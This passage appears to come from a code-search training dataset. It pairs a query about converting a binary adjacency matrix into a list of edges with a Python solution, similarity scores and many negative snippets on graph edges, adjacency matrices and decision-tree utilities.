10E-4\n best_depth = start_depth\n acc = [-1]\n for i in tqdm(range(20),desc='Progress(max_depth)',ncols=70,smoothing=0.5):\n XGBCla = get_XGBmodel(depth=i+start_depth)\n XGBCla.fit(X_train, y_train)\n pred = XGBCla.predict(X_test)\n acc.append(accuracy_score(y_test, pred))\n if (abs(acc[i]-acc[i+1])<tol):\n break\n if (acc[i]<acc[i+1]):\n best_depth = start_depth + i\n print(\"Accuracy: %.4f\" % acc[-1])\n print(\"Best depth: %d\" % best_depth)", "def optimize_parameters(self):\n pass", "def optimize_parameters(self):\n pass", "def optimize_parameters(self):\n pass", "def __init__(self, n_estimators=10, max_features=None, min_samples_split=10, max_depth=None, criterion=None):\n self.max_depth = max_depth\n self.min_samples_split = min_samples_split\n self.max_features = max_features\n self.n_estimators = n_estimators\n self.trees = []", "def objective(params, n_folds=N_FOLDS):\n\n # Perform n_fold cross validation with hyperparameters\n # Use early stopping and evalute based on ROC AUC\n params['num_leaves'] = int(params['num_leaves'])\n params['min_data_in_leaf'] = int(params['min_data_in_leaf'])\n params['max_bin'] = int(params['max_bin'])\n # params['min_child_samples'] = int(params['min_child_samples'])\n print(params)\n cv_results = lgb.cv(params, train_data, nfold=n_folds, num_boost_round=5000,\n early_stopping_rounds=40, metrics='auc', seed=50)\n print(cv_results)\n save_log(str(params) + \"\\n\\n\\n\\n\\n\" + str(cv_results))\n # Extract the best score\n best_score = max(cv_results['auc-mean'])\n\n # Loss must be minimized\n loss = 1 - best_score\n\n # Dictionary with information for evaluation\n return {'loss': loss, 'params': params, 'status': STATUS_OK}", "def test_decision_tree(train,test,maxnodes=None):\n tree = DecisionTree()\n tree.maxnodes = maxnodes\n errors = tree.learn(train,'label')\n print \"Decision tree makes\",errors,\"errors\"\n print \"Depth\",tree.depth(),\"nodes\",tree.numNodes()\n if tree.numNodes() < 100:\n tree.pprint()\n if errors > 0:\n print \"Training errors:\"\n for id,e in enumerate(train.entries):\n res = tree.predict(e[:-1])\n if res != e[-1]:\n if len(e[:-1]) > 10:\n print \" Error on\",id,\"prediction\",res\n else:\n print \" Error on\",e[:-1],\"prediction\",res\n print \"Testing error:\"\n tp,tn,fp,fn = 0,0,0,0\n for e in test.entries:\n res = tree.predict(e[:-1])\n if res and e[-1]:\n tp += 1\n elif res and not e[-1]:\n fp += 1\n elif not res and e[-1]:\n fn += 1\n else:\n tn += 1\n Ntest = len(test.entries)\n print \"True +: %g, True -: %g\"%(float(tp)/Ntest,float(tn)/Ntest) \n print \"False -: %g, False +: %g\"%(float(fn)/Ntest,float(fp)/Ntest)\n print \"Overall error: %g\"%(float(fn+fp)/Ntest,)", "def decision_tree_prediction(example, root, attributes):\n # If reached a leaf node, return the label\n if isinstance(root, str):\n return root\n\n # Attribute that was split on\n attribute = root.attribute\n # Column of the attribute that was split on\n i = get_index(attribute, attributes)\n testValue = example[i]\n # Check every child to see what path the example must take in the decision tree\n for child in root.children:\n if isinstance(child.branch, int):\n if int(testValue) <= child.branch:\n return decision_tree_prediction(example, child.nextTree, attributes)\n elif isinstance(child.branch, float):\n if int(testValue) > child.branch:\n return decision_tree_prediction(example, child.nextTree, attributes)\n# -----------------------------------------------Naive Bayes-------------------------------------------------\n # Naive bayes\n elif child.branch == \"Naive\":\n yes_probability = child.histogram[0]\n no_probability = child.histogram[2]\n i = 0\n for feature in example:\n if feature == \"yes\" or feature == \"no\":\n continue\n if i == 0 or i == 2 or i == 4 or i == 10 or i == 11 or i == 12:\n j = 0\n # Its a float so check\n for key in child.histogram[1][attribute_index[i]]:\n if float(feature) <= float(key) and j == 0:\n yes_probability = yes_probability * child.histogram[1][attribute_index[i]][key]\n elif j == 1:\n yes_probability = yes_probability * child.histogram[1][attribute_index[i]][key]\n j += 1\n for key in child.histogram[1][attribute_index[i]]:\n if float(feature) <= float(key) and j == 0:\n no_probability = no_probability * child.histogram[1][attribute_index[i]][key]\n elif j == 1:\n no_probability = no_probability * child.histogram[1][attribute_index[i]][key]\n j += 1\n else:\n yes_probability = yes_probability * child.histogram[1][attribute_index[i]][feature]\n no_probability = no_probability * child.histogram[3][attribute_index[i]][feature]\n i += 1\n if yes_probability > no_probability:\n return \"yes\"\n elif no_probability >= yes_probability:\n return \"no\"\n# -----------------------------------------------End Naive Bayes-------------------------------------------------\n else:\n if child.branch == testValue:\n return decision_tree_prediction(example, child.nextTree, attributes)" ]
[ "0.73654014", "0.6803678", "0.6700777", "0.669526", "0.6686797", "0.6683199", "0.6660834", "0.6638287", "0.65660405", "0.65332466", "0.65164715", "0.64410394", "0.64108276", "0.64031994", "0.6387443", "0.6330438", "0.62947744", "0.6267406", "0.6226899", "0.62210745", "0.61950547", "0.618679", "0.61643577", "0.6163556", "0.6158607", "0.6140857", "0.6135676", "0.6116667", "0.6091666", "0.6084619", "0.60827655", "0.6080633", "0.60618925", "0.6037695", "0.5986126", "0.592798", "0.59256274", "0.5898142", "0.58902293", "0.58860433", "0.5875145", "0.5862947", "0.58574337", "0.584349", "0.5825657", "0.58058083", "0.5780037", "0.5764929", "0.5764364", "0.5753339", "0.57469946", "0.573422", "0.57211196", "0.5718937", "0.5718334", "0.57156014", "0.5712901", "0.57094085", "0.570826", "0.5704828", "0.56995875", "0.5681553", "0.5677757", "0.5673165", "0.5658144", "0.56543714", "0.56537396", "0.56529766", "0.5651769", "0.5645861", "0.5643615", "0.56387806", "0.5635343", "0.5625096", "0.5620358", "0.56175774", "0.56160766", "0.5610746", "0.56046945", "0.55999774", "0.5597112", "0.5594707", "0.5594528", "0.55882645", "0.55882645", "0.5571795", "0.5569187", "0.5568148", "0.5563414", "0.5560228", "0.55599165", "0.555667", "0.55494547", "0.55485594", "0.55485594", "0.55485594", "0.5548198", "0.55373305", "0.55371124", "0.55340207" ]
0.74380594
0
Converts a binary adjacency matrix to a list of directed edges
def to_adj_list(adj_matrix): adj_list = [] assert (adj_matrix.shape[0] == adj_matrix.shape[1]) for idx in range(adj_matrix.shape[0]): for jdx in range(idx, adj_matrix.shape[0]): if adj_matrix[idx, jdx] == 1: adj_list.append([idx, jdx]) return adj_list
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def edges(adj_mat, vertices):\n return [(i,j) for i,j in\n vertices if (i < j and adj_mat[i][j] == 1)]", "def matrix_to_edges(matrix: numpy.ndarray, include_reverse_edges: bool=True):\n sparse = scipy.sparse.coo_matrix(matrix)\n edges = zip(sparse.row, sparse.col)\n\n if not include_reverse_edges:\n edges = filter(lambda edge: edge[0] <= edge[1], edges)\n return list(edges)", "def _square_adjacency_matrix_to_edgelist(matrix, indices_to_ids):\n\n\tdf_of_matrix = pd.DataFrame(matrix)\t\t\t\t\t\t\t\t\t# Convert the numpy array to a pandas dataframe.\n\tboolean_triu = np.triu(np.ones(df_of_matrix.shape)).astype(np.bool)\t# Create a boolean array of same shape where upper triangle is true.\n\tdf_of_matrix = df_of_matrix.where(boolean_triu)\t\t\t\t\t\t# Make everything but the upper triangle NA so it is ignored by stack.\n\tmelted_matrix = df_of_matrix.stack().reset_index()\t\t\t\t\t# Melt (stack) the array so the first two columns are matrix indices.\n\tmelted_matrix.columns = [\"from\", \"to\", \"value\"]\t\t\t\t\t\t# Rename the columns to indicate this specifies a graph.\n\tmelted_matrix[\"from\"] = pd.to_numeric(melted_matrix[\"from\"])\t\t# Make sure node names are integers because IDs have to be integers.\n\tmelted_matrix[\"to\"] = pd.to_numeric(melted_matrix[\"to\"])\t\t\t# Make sure node names are integers because IDs have to be integers.\n\tmelted_matrix[\"from\"] = melted_matrix[\"from\"].map(indices_to_ids)\t# Rename the node names to be IDs from the dataset not matrix indices.\n\tmelted_matrix[\"to\"] = melted_matrix[\"to\"].map(indices_to_ids)\t\t# Rename the node names to be IDS from the dataset not matrix indices.\n\treturn(melted_matrix)\t\t\t\t\t\t\t\t\t\t\t\t# Return the melted matrix that looks like an edge list.", "def _rectangular_adjacency_matrix_to_edgelist(matrix, row_indices_to_ids, col_indices_to_ids):\n\tdf_of_matrix = pd.DataFrame(matrix)\t\t\t\t\t\t\t\t\t\t# Convert the numpy array to a pandas dataframe.\n\tmelted_matrix = df_of_matrix.stack().reset_index()\t\t\t\t\t\t# Melt (stack) the array so the first two columns are matrix indices.\n\tmelted_matrix.columns = [\"from\", \"to\", \"value\"]\t\t\t\t\t\t\t# Rename the columns to indicate this specifies a graph.\n\tmelted_matrix[\"from\"] = pd.to_numeric(melted_matrix[\"from\"])\t\t\t# Make sure node names are integers because IDs have to be integers.\n\tmelted_matrix[\"to\"] = pd.to_numeric(melted_matrix[\"to\"])\t\t\t\t# Make sure node names are integers because IDs have to be integers.\n\tmelted_matrix[\"from\"] = melted_matrix[\"from\"].map(row_indices_to_ids)\t# Rename the node names to be IDs from the dataset not matrix indices.\n\tmelted_matrix[\"to\"] = melted_matrix[\"to\"].map(col_indices_to_ids)\t\t# Rename the node names to be IDS from the dataset not matrix indices.\n\treturn(melted_matrix)\t\t\t\t\t\t\t\t\t\t\t\t\t# Return the melted matrix that looks like an edge list.", "def to_edges(graph):\n return list(zip(graph[:-1], graph[1:]))", "def adjacency_matrix(g):\n nodes = sorted(g.keys())\n adj = []\n for row_node in nodes:\n row = []\n for column_node in nodes:\n if column_node in g[row_node]:\n row.append(1)\n else:\n row.append(0)\n adj.append(row)\n \n return adj", "def generate_edges(graph):\n edges = []\n\n # for each node in graph\n for node in graph:\n\n # for each neighbour node of a single node\n for neighbour in graph[node]:\n # if edge exists then append\n edges.append((node, neighbour))\n return edges", "def getEdges(self):\n edgeList = []\n for v in self.adjList:\n for i in range(len(self.adjList[v])):\n edgeList.append((v, self.adjList[v][i]))\n return edgeList", "def edges(self):\n edge_list = []\n for node1 in self.node_dict:\n for node2 in self.node_dict[node1]:\n edge_list.append((node1,\n node2,\n self.node_dict[node1][node2]))\n return edge_list", "def getEdges(self):\n # for node in graph,\n # return node -> node for j in graph[node]\n\n return [\"->\".join([str(n1), str(n2)]) for n1 in self.graph.keys() for n2 in self.graph[n1]]", "def create_edgelist(self):\n self.edgelist = []\n \n for i in range(len(self.Adjmatrix)):\n for j in range(len(self.Adjmatrix)):\n if(self.Adjmatrix[i, j] == 1):\n middlex = 0.5*(self.x[i] + self.x[j])\n middley = 0.5*(self.y[i] + self.y[j])\n self.edgelist.append({\"start node\": i, \"end node\": j, \"link length\": self.Dismatrix[i, j], \"edgediameter\": self.edgediameter, \"middlex\": middlex, \"middley\": middley})", "def path_to_edges(self):\n\n edges = [0 for i in range(self.graph.num_edges)]\n\n for row in range(self.graph.rows):\n for col in range(self.graph.cols):\n if self.path[row][col]:\n if row + col < self.graph.cols - 1:\n if col < self.graph.cols - 1 and self.path[row][col + 1]:\n #print \"(%d,%d) (%d,%d)\" % (row, col, row, col + 1)\n edge_number = self.graph.diags[row + col] + 2 * row\n edges[edge_number] = 1\n if row < self.graph.rows - 1 and self.path[row + 1][col]:\n #print \"(%d,%d) (%d,%d)\" % (row, col, row + 1, col)\n edge_number = self.graph.diags[row + col] + 1 + 2 * row\n edges[edge_number] = 1\n else:\n col_dist = self.graph.cols - col - 1\n if col < self.graph.cols - 1 and self.path[row][col + 1]:\n #print \"(%d,%d) (%d,%d)\" % (row, col, row, col + 1)\n edge_number = self.graph.diags[row + col] + 2 * col_dist - 1\n edges[edge_number] = 1\n if row < self.graph.rows - 1 and self.path[row + 1][col]:\n #print \"(%d,%d) (%d,%d)\" % (row, col, row + 1, col)\n edge_number = self.graph.diags[row + col] + 2 * col_dist\n edges[edge_number] = 1\n \n\n return edges", "def edges(self, node):\n nID = self.n2ID[node]\n return [(self.ID2n[n1ID], self.ID2n[n2ID]) for (n1ID, n2ID) in self.G.edges(nID)]", "def edges_to_adjacency_matrix(mesh):\n adja = graph.edges_to_coo(mesh.edges,\n data=np.ones(len(mesh.edges),\n dtype=np.int8))\n\n return sparse.triu(adja) + sparse.tril(adja).transpose()", "def getEdges(self):\n\n return [(cell, vertice) for cell in self.adjacent.keys() for vertice in self.adjacent[cell]]", "def adjacencyLists():\r\n anyNeighbor = lambda u: any(self.neighbors(u))\r\n verticesWithNeighbors = filter(anyNeighbor, sorted(self.vertices()))\r\n return map(edgesFromVertex, verticesWithNeighbors)", "def adjacencyLists():\r\n anyNeighbor = lambda u: any(self.neighbors(u))\r\n verticesWithNeighbors = filter(anyNeighbor, sorted(self.vertices()))\r\n return map(edgesFromVertex, verticesWithNeighbors)", "def get_all_edges(self):\n \n ans = []\n for node_id in self.neighbors:\n for edge_to_neighbor in self.neighbors[node_id]:\n ans.append(edge_to_neighbor)\n\n return ans", "def edges(self):\n es = []\n for vertex1 in self.vertices():\n for vertex2 in self.out_vertices(vertex1):\n es.append(self[vertex1][vertex2])\n return es", "def adjacencyMatrix(R, edges):\n A = np.zeros((len(R),len(R)))\n for i in range(0, len(edges)):\n A[edges[i][0]][edges[i][1]] = 1\n return A", "def affgraph_to_edgelist(aff, nhood):\n node1, node2 = nodelist_from_shape(aff.shape[1:], nhood)\n return node1.ravel(), node2.ravel(), aff.ravel()", "def edges(self):\n return [(a, b) for a in self._consequences_of\n for b in self._consequences_of[a]]", "def get_edge_list(self):\n return [(edge.value, edge.node_from.value, edge.node_to.value) for edge in self.edges]", "def _mout_edges(nodes):\n n = nodes.shape[0]\n edges = []\n for i in range(0, n - 1):\n for j in range(i, n):\n if abs(nodes[i, 0] - nodes[j, 0]) > 1:\n break\n elif abs(nodes[i, 0] - nodes[j, 0]) == 1 and \\\n abs(nodes[i, 1] - nodes[j, 1]) == 0:\n edges.append([i, j])\n elif abs(nodes[i, 1] - nodes[j, 1]) == 1:\n edges.append([i, j])\n return edges", "def enumerate_links_around_node(self, node):\n\n l0 = self.node_link[node]\n l = l0\n edges = []\n traversing = True\n while traversing:\n edges.append(l)\n v = l[0]\n if v == node:\n l = self.pred_right[l]\n else:\n l = self.pred_left[l]\n if l0 == l:\n traversing = False\n if l0[1] == l[0] and l0[0] == l[1]:\n traversing = False\n #print v, l\n #raw_input('here')\n return edges", "def _adjacency_to_edges(adjacency):\n edges = set()\n for u in adjacency:\n for v in adjacency[u]:\n try:\n edge = (u, v) if u <= v else (v, u)\n except TypeError:\n # Py3 does not allow sorting of unlike types\n if (v, u) in edges:\n continue\n edge = (u, v)\n\n edges.add(edge)\n return edges", "def make_adjacency_list_from_edge_list(N, edges):\n adjacency_list = [[] for _ in range(N)]\n for e, (x, y, r) in enumerate(edges):\n adjacency_list[x].append((e, y, r))\n adjacency_list[y].append((e, x, r))\n return adjacency_list", "def get_edges(self) -> []:\n graph_edges = []\n\n for vertex in self.adj_list:\n for connection in self.adj_list[vertex]:\n if (vertex, connection) not in graph_edges and (connection, vertex) not in graph_edges:\n graph_edges.append((vertex, connection))\n\n return graph_edges", "def adjacencyList(elems):\n if len(elems.shape) != 2 or elems.shape[1] != 2:\n raise ValueError,\"\"\"Expected a set of 2-node elements.\"\"\"\n elems = elems.astype(int)\n ok = [ where(elems==i) for i in range(elems.max()+1) ]\n return [ list(elems[w[0],1-w[1]]) for w in ok ]", "def buildGraph(M: List[List[int]]) -> List:\n l = len(M)\n G = [Node(i) for i in range(l)]\n for i in range(len(M)):\n for j in range(len(M)):\n if M[i][j]:\n G[i].add_adjacent(G[j])\n return G", "def get_graph(adj):\n # remove all zeros rows and columns\n adj = adj[~np.all(adj == 0, axis=1)]\n adj = adj[:, ~np.all(adj == 0, axis=0)]\n adj = np.asmatrix(adj)\n G = nx.from_numpy_matrix(adj)\n return G", "def adjacency_matrix_to_dict_graph(adjacency_matrix):\n\n # Check if the matrix has the right shape\n number_row_edges = len(adjacency_matrix)\n number_col_edges = len(adjacency_matrix[0])\n assert len(adjacency_matrix) == len(adjacency_matrix[0]), \\\n f\"Expected number of row = number of columns. {number_row_edges}\" \\\n f\" rows and {number_col_edges} columns found.\"\n\n return {i: (np.nonzero(row)[0]).tolist() for\n i, row in enumerate(adjacency_matrix)}", "def internal_adjacency(self, node_list):\n # Create igraph Graph object describing the subgraph\n subgraph = self.graph.subgraph(node_list)\n # Get adjacency matrix\n return np.array(subgraph.get_adjacency(type=2).data).astype(np.int8)", "def matrix_to_list():\n graph = {\n node: [\n neighbour for neighbour in range(self.rank) if self.matrix[node, neighbour] != inf\n ] for node in range(self.rank)\n }\n return graph", "def to_edge_list(self, interaction_symbol='<->', weights=True):\n return interaction_table_to_edge_list(\n self, interaction_symbol=interaction_symbol, weights=weights\n )", "def interaction_table_to_edge_list(\n interaction_table, interaction_symbol='<->', weights=True\n):\n process_index_intensity = process_index\n if weights:\n process_index_intensity = process_index_with_weights\n return [\n process_index_intensity(index, intensity, interaction_symbol)\n for index, intensity in\n zip(interaction_table.df.index, interaction_table.df['intensity'])\n ]", "def colored_edges(genome):\n edges = []\n for chromo in genome:\n nodes = [0] + chromosome_to_cycle(chromo)\n nodes.append(nodes[1])\n for j in range(1, len(chromo) + 1):\n edges.append((nodes[2 * j], nodes[2 * j + 1]))\n\n return edges", "def __generate_edges(self):\n edges = []\n for vertex in self.__graph_dict:\n for neighbour in self.__graph_dict[vertex]:\n edges.append({vertex, neighbour})\n return edges", "def generate_edges(self):\n edges = []\n for vertex in self.graph_dict:\n for neighbour in self.graph_dict[vertex]:\n if (neighbour, vertex) not in edges:\n edges.append((vertex, neighbour))\n \n for pair in edges:\n for otherpair in edges:\n if pair[1] == otherpair[0]:\n edges.append((pair[0],otherpair[1]))\n return edges", "def edgify(vertices:list)->list:\n edges = []\n for k in range(0, len(vertices) - 1):\n edges.append([vertices[k], vertices[k + 1]])\n return edges", "def convert_sparse_to_igraph(indices, matrix):\n # sources, targets = matrix.nonzero()\n # weights = matrix[sources, targets]\n # weights = np.array(weights)[0]\n # print(dir(louvain))\n # ig = igraph.Graph(zip(sources, targets), directed=True,\n # edge_attrs={'weight': weights})\n # return ig\n g = igraph.Graph.Adjacency((matrix > 0).tolist())\n g.es['weight'] = matrix[matrix.nonzero()]\n # g.vs['label'] = node_names # or a.index/a.columns\n return g", "def adjacencyMatrixplot(nodes):\n adMat = np.zeros((len(nodes), len(nodes)), int)\n for node in nodes:\n if (node.id == 0):continue\n parent, child = node.parent, node.id # -1 -> tally with list indices\n adMat[parent, child] = 1\n return adMat", "def edges(self):\n return [(k, val) for k, v in self.dict.iteritems() for val in v]", "def adj_matrix(self):\n return nx.adj_matrix(self.network)", "def get_edges(graph):\n edges = []\n for vertex in graph.keys():\n connected_nodes = graph[vertex]\n for node in connected_nodes:\n edges.append(str(vertex + node))\n\n return edges", "def read_graph(Amatrix):\n\tG = nx.from_numpy_matrix(Amatrix)\n\tG = G.to_undirected()\n\treturn G", "def adjacency(self):\n if self.E > 0:\n i = self.edges[:, 0]\n j = self.edges[:, 1]\n adj = coo_matrix((np.ones(self.E), (i, j)),\n shape=(self.V, self.V))\n else:\n adj = coo_matrix((self.V, self.V))\n return adj", "def edges(self):\n edges = []\n for key in self:\n if key:\n for edge in self[key]:\n edges.append((key, edge))\n return edges", "def __generate_edges(self):\n\n edges = []\n for vertex in self.__graph_dict:\n for neighbour in self.__graph_dict[vertex]:\n if {neighbour, vertex} not in edges:\n edges.append( {vertex,neighbour} )\n return edges", "def generate_edges(self):\n edges = []\n for vertex in self.graph_dict:\n for neighbour in self.graph_dict[vertex]:\n if {neighbour, vertex} not in edges:\n edges.append({neighbour, vertex})\n return edges", "def adj_matrix(G,nodelist=None,weight='weight'):\n return nx.to_numpy_matrix(G,nodelist=nodelist,weight=weight)", "def edges(self):\n edges = []\n for key in self._g:\n if self._g[key]:\n for value in self._g[key]:\n edges.append((key, value))\n return edges", "def path_nodes_to_edges(path):\n \n # Edge sequence initialization\n edge_sequence = []\n \n for i in range(len(path) - 1):\n edge_sequence.append((path[i], path[i+1]))\n \n return edge_sequence", "def __generate_edges(self):\r\n edges = []\r\n for vertex in self.__graph_dict:\r\n for neighbor in self.__graph_dict[vertex]:\r\n if {neighbor, vertex} not in edges:\r\n edges.append({vertex, neighbor})\r\n return edges", "def get_edges(self):\n return_set = set()\n for outer_index, outer_list in enumerate(self._adjmatrix):\n for inner_index, inner_item in enumerate(outer_list):\n if(inner_item):\n return_set.add(\n (self._name[outer_index],\n self._name[inner_index]))\n return return_set", "def edges(self):\n edges = []\n for key in self:\n if key:\n for edge in self[key]:\n edges.append((key, edge, self[key][edge]))\n return edges", "def get_edges(self):\n edges = []\n for (key, target) in self.edges.keys():\n edges.append((key, target))\n return edges", "def edgeAdjacency( gen ):\n if gen == 0:\n return []\n elif gen == 1:\n return [(0,5), (1,8), (2,11)]\n else:\n raise ValueError, \"Hasn't been programmed yet!\"", "def create_graph(matrix):\n g = OrderedDict()\n for i in xrange(matrix.size):\n g[i] = []\n n1, n2 = compute_neighbours(i, matrix)\n if n1:\n g[i].append(n1)\n if n2:\n g[i].append(n2)\n return g", "def path_to_edges(path):\n return list((u, v) for u, v in zip(path[:-1], path[1:]))", "def get_route_edges_from_route(route):\n edges_in_route = []\n\n for i in range(0, len(route) - 1):\n\n edge = route[i], route[i + 1]\n\n edges_in_route.append(edge)\n\n return edges_in_route", "def get_adjacency_matrix(self):\n\n # Get dimension of future matrix\n dim = max([node.value for node in self.nodes])\n\n # Initialize square matrix of zeros\n # Matrix is square and indexes by from, to node values\n adjacency_matrix = [[0 for _ in range(dim+1)] for _ in range(dim+1)]\n\n # Insert edge value at the from, to coordinates\n # That is, fully identify each \"from, edge, to\" triplet\n for edge in self.edges:\n row = edge.node_from.value\n col = edge.node_to.value\n val = edge.value\n\n adjacency_matrix[row][col] = val\n\n # Return matrix of edge values indexed by from, to node values\n return adjacency_matrix", "def calculate_connectivity_matrix(molecule, element_diagonal=False):\n num_atoms = molecule.GetNumAtoms()\n adjacency = np.zeros((num_atoms, num_atoms))\n for bond in molecule.GetBonds():\n bond_type = str(bond.GetBondType()).lower()\n bond_order = get_bond_order(bond_type)\n i = bond.GetBeginAtomIdx()\n j = bond.GetEndAtomIdx()\n adjacency[i, j] = bond_order\n adjacency[j, i] = bond_order\n if element_diagonal:\n for i, atom in enumerate(molecule.GetAtoms()):\n adjacency[i, i] = atom.GetAtomicNum()\n return adjacency", "def get_edges(chromosome):\n edges = []\n for i in range(len(chromosome)):\n for j in range(len(chromosome[i]) - 1):\n m = 2 * chromosome[i][j]\n if chromosome[i][j] < 0:\n m = -m - 1\n n = 2 * chromosome[i][j + 1] - 1\n if chromosome[i][j + 1] < 0:\n n = -n -1\n edges.append((m, n))\n m = 2 * chromosome[i][j + 1]\n if chromosome[i][j + 1] < 0:\n m = -m - 1\n n = 2 * chromosome[i][0] - 1\n if chromosome[i][0] < 0:\n n = -n -1\n edges.append((m, n))\n return edges", "def adjacency_matrix(edge_index: nb.int64[:,:],\n n: nb.int64) -> nb.boolean[:,:]:\n adj_mat = np.eye(n, dtype=np.bool_)\n for e in edge_index:\n adj_mat[e[0],e[1]] = True\n return adj_mat", "def __generate_edges(self):\n edges = []\n for vertex in self.__graph_dict:\n for neighbour in self.__graph_dict[vertex]:\n if {neighbour, vertex} not in edges:\n edges.append({vertex, neighbour})\n return edges", "def generate_edge_from_screen():\n weight = 1 # all edges have weight of 1\n edges_lst = []\n for row in range(ROWS):\n for col in range(COLS):\n node_name = get_node_name(row, col)\n # 4 edges:\n set_four_edges(col, row, edges_lst, weight)\n # 2 edge rows or 2 edge columns without the 4 edges:\n set_edge_rows_cols(col, edges_lst, row, weight)\n # else - general case:\n if 0 < row < ROWS - 1 and 0 < col < COLS - 1:\n set_general_edge(col, edges_lst, row, weight)\n return edges_lst", "def make_graph(self):\n # update the neighbors in the graph\n self.update_neighbors()\n\n # Go through each node and get their neighbors\n self.edges = []\n for node_name in self.nodes:\n\n # get the neighbors\n node_neighbors = self.nodes[node_name].neighbors\n\n # go through neighbors\n for neighbor_name in node_neighbors:\n\n # Make the edge key\n edge_key = \"-\".join(sorted([node_name, neighbor_name]))\n\n # Add it to the edge list if it is not already present\n if edge_key not in self.edges:\n\n self.edges.append(edge_key)\n\n return self.edges", "def edges(self):\r\n return [\r\n (parent, child)\r\n for parent in self._children_of\r\n for child in self._children_of[parent]\r\n ]", "def adj2edge(adj):\n adj = adj.tocoo().astype(np.float64)\n row = adj.row\n col = adj.col\n values = adj.data\n edge_weights = torch.Tensor(values)\n edge_index = torch.LongTensor([list(row),list(col)])\n return edge_index, edge_weights", "def convert_to_list(graph):\n result = []\n for i in range(graph.size):\n row = []\n for j in range(graph.size):\n if graph.matrix[i][j]:\n row.append(j)\n result.append(row)\n return result", "def create_adjacency_matrix(self, edges):\n matrix = np.zeros([self.max_words, self.max_words * self.edge_types * 2])\n for edge in edges:\n src = edge[0]\n e_type = edge[1]\n dest = edge[2]\n self.set_matrix(matrix, src, dest, e_type, 1)\n return matrix", "def convert_tree_as_set_to_adjacencies(tree):\n edges = {}\n for i, j in tree:\n if i not in edges:\n edges[i] = [j]\n else:\n edges[i].append(j)\n if j not in edges:\n edges[j] = [i]\n else:\n edges[j].append(i)\n return edges", "def edges(self):\n return [edge(self.vertices[i - 1], self.vertices[(i)]) for i in range(-1, len(self.vertices))]", "def _get_tri_edges(tri):\n return [[tri[1], tri[2]], [tri[2], tri[0]], [tri[0], tri[1]]]", "def edges(self):\n return self.dovetails + self.containments + self.internals", "def edges(self) -> Iterable[Tuple[Node]]:\n edges = []\n for node in self.__graph_dict.keys():\n for neighbour in self.__graph_dict[node]:\n # Since all edges go both ways, we need only return one of them.\n if {neighbour, node} not in edges:\n edges.append({node, neighbour})\n yield (node, neighbour)", "def Adjacency(graph,digraph=False): \n N = len(graph.nodes)\n adj = np.zeros((N,N))\n edges = graph.edges\n for a,b in edges:\n adj[a,b] = 1\n if not digraph:\n adj[b,a] = 1\n return adj", "def edges(self) -> Set[Tuple[int, int]] : \n edges : Set[Tuple[int, int]] = set()\n for node_id in self.nodes: # iterator over id's\n for adj_node in self.nodes[node_id]:\n edge = (node_id, adj_node)\n if self.directed:\n edges.add(edge)\n else:\n if edge[::-1] not in edges: # if reverse edge not in edges...\n edges.add(edge)\n return edges", "def get_adj_matrix(self):\n # This is currently implemented for the case when there are only two edge types (edge and no-edge)\n assert self.Z_edges_logits.shape[1] == 2\n Z_edge_logits = self.Z_edges_logits.detach().cpu().numpy() # [num_edges, 2]\n prob = np.exp(Z_edge_logits) / np.sum(np.exp(Z_edge_logits), axis=-1, keepdims=True) # [num_edges, 2]\n adj_matrix = np.zeros((self.num_nodes, self.num_nodes))\n mask = np.ones((self.num_nodes, self.num_nodes), dtype=bool) & ~np.eye(self.num_nodes, dtype=bool)\n adj_matrix[mask] = prob[:, 1]\n return adj_matrix", "def get_edges(self):\n return [tuple(edge) for edge in self._tree.tree_grid[1:3, :].T]", "def formAdjacencyMatrix(self):\n self.adjacencyMatrix = dict()\n for i in self.node:\n self.adjacencyMatrix[i] = dict()\n for j in self.node:\n self.adjacencyMatrix[i][j] = 0\n \n for ij in self.link:\n self.adjacencyMatrix[self.link[ij].tail][self.link[ij].head] = 1", "def edges_to_matrix(edge_list: List[Tuple[int, int]], add_reverse_edges: bool,\n shape: Tuple[int, int], dtype: TypeVar=bool, sparse: bool=True):\n matrix = scipy.sparse.csc_matrix(\n (numpy.ones(len(edge_list)), zip(*edge_list)), dtype=dtype, shape=shape,\n )\n\n if add_reverse_edges:\n matrix = (matrix + matrix.T) > 0\n matrix = matrix.astype(dtype)\n\n if not sparse:\n matrix = matrix.toarray()\n\n return matrix", "def transpose_graph(adj):\n trans_adj = [[] for _ in range(len(adj))]\n\n for i in range(len(adj)):\n for j in adj[i]:\n trans_adj[j].append(i)\n\n return trans_adj", "def findIsland(i, j, matrix):\n visited = [[ False for ele in row] for row in matrix]\n totalEdges = traverseNodes(i, j, matrix, visited)\n\n return totalEdges", "def from_numpy_matrix(self, matrix, node_names=None, directed=False, *args, **kwargs):\n\t\tN = list()\n\t\tE = dict()\n\t\tneighbours = dict()\n\n\t\t# Assert Square Adjacency Matrix\n\t\tif matrix.shape[0] != matrix.shape[1]:\n\t\t\traise ValueError('Adjacency Matrix not square')\n\n\t\t#matrix = matrix.A\n\n\t\tN = list( np.arange(matrix.shape[0]) )\n\t\tfor i, row in enumerate(matrix,start=0):\n\t\t\tneighbours[i] = []\n\t\t\tfor j, value in enumerate(row,start=0):\n\t\t\t\t# the diagonal is (must be) always zero (distance = 0)\n\t\t\t\tif i==j:\n\t\t\t\t\tcontinue\n\t\t\t\t# infinite distance doesn't have to be calculated\n\t\t\t\telif value == np.inf:\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\tE[ (i,j) ] = float(value)\n\t\t\t\t\tneighbours[i].append(j)\n\n\t\treturn Dijkstra(N, E, neighbours, node_names, directed, *args, **kwargs)", "def path2edge(iterable,graph):\r\n return (graph.es[graph.get_eid(pair[0],pair[1])] for pair in pairwise(iterable))", "def get_adjacency_matrix(self):\n m = zeros(self.size)\n perm = self.array_form\n for i in xrange(self.size - 1):\n m[perm[i], perm[i + 1]] = 1\n return m", "def to_undirected(adjmat):\n num_rows=adjmat.shape[0]\n num_cols=adjmat.shape[1]\n adjmat_directed=np.zeros((num_rows, num_cols), dtype=int)\n tmpadjmat=adjmat.astype(int)\n\n for i in range(num_rows):\n for j in range(num_cols):\n adjmat_directed[i, j] = tmpadjmat.iloc[i, j] + tmpadjmat.iloc[j, i]\n\n adjmat_directed=pd.DataFrame(index=adjmat.index, data=adjmat_directed, columns=adjmat.columns, dtype=bool)\n return(adjmat_directed)", "def to_undirected(adjmat):\n num_rows=adjmat.shape[0]\n num_cols=adjmat.shape[1]\n adjmat_directed=np.zeros((num_rows, num_cols), dtype=int)\n tmpadjmat=adjmat.astype(int)\n\n for i in range(num_rows):\n for j in range(num_cols):\n adjmat_directed[i, j] = 